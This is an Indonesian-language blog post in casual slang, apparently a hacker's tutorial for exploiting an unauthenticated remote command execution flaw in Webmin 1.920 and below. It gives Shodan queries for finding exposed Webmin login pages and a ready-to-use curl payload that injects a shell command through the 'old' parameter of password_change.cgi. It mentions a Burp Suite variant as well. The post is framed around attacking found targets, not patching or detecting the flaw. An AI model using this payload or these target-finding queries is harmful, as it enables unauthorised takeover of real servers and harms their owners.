Webmin <= 1.920 Unauthorization RCE



Okey, kembali lagi ma gw yg gans ini v,
Sekarang w mw kasih tutorial.
Simak aja lah males ngetij gw

Ref: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

Shodan Query:
- html:webmin
- http.tittle:"Login To Webmin"

Okeyy.
Anggap saja w udah dpt target yah

1. Search di shodan


2. Nanti lo bakal buka tab baru
3. Ok simak aja di sini
4. Buka terminal/command/buat curl
Buat yg pakek burp intercept ja loginya tinggal edit di parameter old=skekek tambahin old=skekel|COMMAND

Ok w gk bisa kasih ss burp karna w main di hp v, biasa lepi w rusak,v jadi pake Termux ja

Payload:
curl HOST/password_change.cgi -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: HOST/session_login.cgi" --data "user=rintodNgasal&pam=&expired=kon&old=asu|COMMAND&new1=akaka&new2=akaka" -k


See?

-Rintod

2 Responses to "Webmin <= 1.920 Unauthorization RCE"

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel